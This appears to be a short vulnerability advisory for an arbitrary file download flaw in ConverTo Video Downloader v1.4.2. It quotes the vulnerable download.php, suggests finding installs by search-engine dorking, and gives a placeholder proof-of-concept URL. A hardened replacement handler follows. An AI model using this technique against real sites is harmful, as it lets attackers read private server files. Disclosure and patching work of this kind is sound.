ConverTo Video Downloader and Converter version 1.4.2 suffers from a file download vulnerability.
====================================================================================================================================
| # Title : ConverTo Video Downloader & Converter v1.4.2 - Arbitrary File Download Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://codecanyon.net/item/converto-video-downloader-converter/13225966 |
| # Dork : |
====================================================================================================================================
poc :
[+] Dorking in Google or another search engine.
[+] Affected file: download.php
[+] line 12: readfile ($file); and line 5: $file = urldecode($_GET['f']); (line numbers refer to the vendor's download.php)
<?php
if(isset($_GET['f'])){
    // Content-Length is taken from a second client-controlled parameter; convertToBytes() is not shown in this excerpt.
    $siz = convertToBytes($_GET['sz']);
    // Line 5 of the vendor file: the path to serve comes straight from the query string, with no validation.
    $file = urldecode($_GET['f']);
    $rand = rand(0,5000);
    header("Content-Description: File Transfer");
    header("Content-Type: application/octet-stream");
    header('Content-Length: ' . $siz);
    header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");
    ob_clean(); flush();
    // Line 12 of the vendor file: whatever path was supplied is read and sent to the client.
    readfile ($file);
}
[+] http://localhost/[PATH]/download.php?f= Ev!l
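A hardened replacement for the handler above, added here as an example and not the vendor's code. It assumes converted files live in a fixed downloads/ directory next to the script and that the client supplies only a bare file name in f=; the Content-Length is read from disk instead of from the client.

```php
<?php
// Added example (not the vendor's code): hardened download handler.
// Assumption: converted videos are stored in DOWNLOAD_DIR and ?f= carries a bare file name.
const DOWNLOAD_DIR = __DIR__ . '/downloads';

function resolve_download(string $requested): ?string
{
    // Accept only a plain file name made of safe characters, ending in .mp4.
    if ($requested === '' || basename($requested) !== $requested
        || !preg_match('/^[A-Za-z0-9_.-]+\.mp4$/', $requested)) {
        return null;
    }
    $base = realpath(DOWNLOAD_DIR);
    $path = realpath(DOWNLOAD_DIR . '/' . $requested);
    // realpath() resolves symlinks and "..", so require the result to stay inside DOWNLOAD_DIR.
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

if (isset($_GET['f'])) {
    $path = resolve_download((string) $_GET['f']);
    if ($path === null) {
        http_response_code(404);
        exit('Not found');
    }
    $rand = random_int(0, 5000);
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Length: ' . filesize($path)); // size from disk, not from the query string
    header("Content-Disposition: attachment; filename=Facebook_video_$rand.mp4");
    ob_clean();
    flush();
    readfile($path);
}
```

Requests naming anything outside downloads/ (absolute paths, ../ sequences, symlinks pointing elsewhere) resolve to null and get a 404 instead of the file contents.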
Greetings to :
=======================================================================================================================================
jericho * Larry W. Cashdollar * brutelogic * shadow_00715 * 9aylas * djroot.dz * LiquidWorm * Hussin-X * D4NB4R * ViRuS_Ra3cH * yasMouh * CraCkEr |
=======================================================================================================================================